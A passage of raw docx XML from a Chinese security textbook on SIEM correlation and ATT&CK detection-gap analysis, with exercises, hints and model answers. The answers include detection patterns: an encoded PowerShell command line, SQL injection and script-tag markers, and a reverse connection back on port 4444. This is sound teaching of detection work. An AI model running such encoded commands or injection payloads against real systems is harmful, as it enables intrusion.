      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">也无力检测；（2）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">高质量的关联规则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——规则既不能过于宽泛（淹没在误报中），也不能过于严苛（漏报）；（3）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">持续运营</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——威胁和技术不断变化，检测规则需要持续调优和更新。因而，将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">映射作为驱动检测规则持续完善的框架，结合红蓝对抗验证，成为现代检测工程的标准实践。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接下来的习题巩固本节的核心概念，并引导读者将攻击检测思维迁移到真实的靶机环境中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题与提示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1196"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【提取题】简述基于签名的检测与基于异常的检测的核心区别，并分别给出一种在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中实现的场景。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1196"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【提取题】说明</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测覆盖度差距分析的基本步骤，并解释这一分析对蓝队建设为何重要。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1196"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【提取题】什么是告警分诊？为什么在大型网络中可接受的误报率是动态变化的？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1196"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">【迁移任务】假定你现在要对靶机开展的“完整杀伤链”攻击（见第22章）设计</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测规则。选择至少两个攻击阶段（例如端口扫描期和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞利用期），写出你希望关联的事件、数据源，以及判断为恶意的条件。不必编写具体规则语法，但要给出清晰的检测逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示（在尝试解答前阅读）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1197"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对第1题，回顾</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snort </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的规则匹配（签名）和统计/学习模型的区别。SIEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中基于异常的检测可以是“某台服务器在凌晨3点出现大量登录失败”，这是偏离历史基线的异常，而不是预定义特征。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1197"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对第2题，回顾上文“枚举威胁→逐技术审计→差距排序→填补验证”四步，结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的数据源字段理解为何需要日志覆盖。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1197"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对第3题，思考告警分诊的优先级逻辑：一台面向公网的数据库服务器的暴力破解告警比一台隔离测试服务器的同样告警更紧急。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1197"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对第4题，可参考上表中的扫描行（T1046）和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击行（T1190），并结合靶机可能产生的日志：Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描会在防火墙或主机防火墙上留下连接痕迹；SQLi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入尝试会在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">访问日志中出现异常</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关键字，随后可能观察到从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器向攻击者的反向连接。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答要点（核验理解）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1198"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">签名检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基于预定义的已知恶意模式（如特定字符串、字节序列、正则表达式），优点是准确率高、误报少，缺点是无法检测未知攻击。SIEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">场景：若日志中出现“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd.exe /c powershell -enc &lt;Base64&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">”即告警（匹配已知恶意命令行模式）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">异常检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">基于偏离正常行为基线（如网络流量时间分布、用户登录时间、进程启动频率等），优点是可检测未知异常，缺点是初始误报高且基线维护复杂。SIEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">场景：学习某服务器三个月内每小时的出站流量均值，当前流量超出3倍标准差则触发告警。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1198"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">差距分析步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：①确定威胁情境内相关的攻击技术列表；②逐项检查现有日志和检测能力；③标识覆盖缺口并按风险排序；④开发检测规则并进行红蓝测试验证；⑤定期重复。重要性在于避免防御的盲目性，将有限的资源投向最可能被使用且危害大的技术上，提升检测工程的投资回报率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1198"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">告警分诊</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是根据事件的业务影响、攻击阶段、资产价值等因素，为安全事件分级，确保分析师优先处理高风险事件。可接受的误报率是动态的，因为在网络重大事件（如新漏洞爆发、大型攻击活动）期间，更多告警可能是真实的，此时宁可提高灵敏度容忍一定误报；在平静时期则降低灵敏度以控制分析负载。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1198"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移任务答案示例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（仅示意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">②）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阶段1：端口扫描检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。数据源：防火墙拒绝日志、NetFlow。关联条件：同一源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在1分钟内尝试连接目标10个以上不同端口，且绝大多数连接被拒绝或超时。将该源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标记为“侦察阶段”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1199"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阶段2：Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞利用检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。数据源：Web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器访问日志（Apache/Nginx）、应用层防火墙日志。关联条件：在“侦察阶段”标记的源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对同一</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器发起</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求，且请求中包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注释符（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）、UNION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关键字或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签。同时，若</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器随后向外部</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">发起非</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口连接（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4444），判定为利用成功并回连，生成高优先级事件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移任务拓展</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：尝试在自己的靶机环境中启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sysmon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Winlogbeat（Windows）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Auditd + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Filebeat（Linux），并将日志导入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SIEM（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk Free </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ELK）。使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描靶机，观察是否产生预期日志，并编写一条简单的关联查询，将扫描告警与后续的漏洞利用尝试关联起来。记录误报来源，思考如何通过白名单或阈值调整优化。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="335"/>
    <w:bookmarkStart w:id="336" w:name="小结-22"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节将检测工程从单引擎签名匹配提升为基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的全网关联分析与基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的系统性覆盖度评估。SIEM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过聚合多源日志、应用关联规则和告警分诊，把零散告警还原为攻击全景；ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">则为“检测什么”提供了标准化的威胁模型，驱动差距分析与检测规则建设。全书的攻击手段——扫描、ARP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗、注入、提权、横向移动与持久化——均可在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">框架内找到映射，并对应具体的日志源和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测思路，这构成了本书攻防对称理念的集中兑现。理解这些概念后，读者应能在实际授权环境中，不仅编写孤立检测签名，更能体系化地设计整个安全监控方案。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="336"/>
    <w:bookmarkStart w:id="337" w:name="延伸阅读白名单-10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1200"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bejtlich, R. 《The Practice of Network Security Monitoring》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：基于网络监控的防御哲学，深入讲解如何使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NSM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据（包括会话数据、完整内容数据、统计数据和告警数据）进行入侵分析，是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关联分析思想的实践先驱。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1200"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">官方网站（attack.mitre.org）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：框架定义、技术详情、数据源和缓解措施的首选参考。深入阅读特定技术的数据源建议，可大幅提升检测规则设计的准确性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1200"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NIST SP 800 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">系列，尤其是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SP 800-61《Computer Security Incident Handling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Guide》和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SP 800-92《Guide to Computer Security Log Management》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：提供了安全事件处理和日志管理的标准化指南，与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SIEM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">部署和安全运营中心（SOC）建设高度相关。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1200"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CIS Benchmarks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：提供了操作系统和中间件日志配置的基线建议，确保具备</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">技术所需的数据源。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
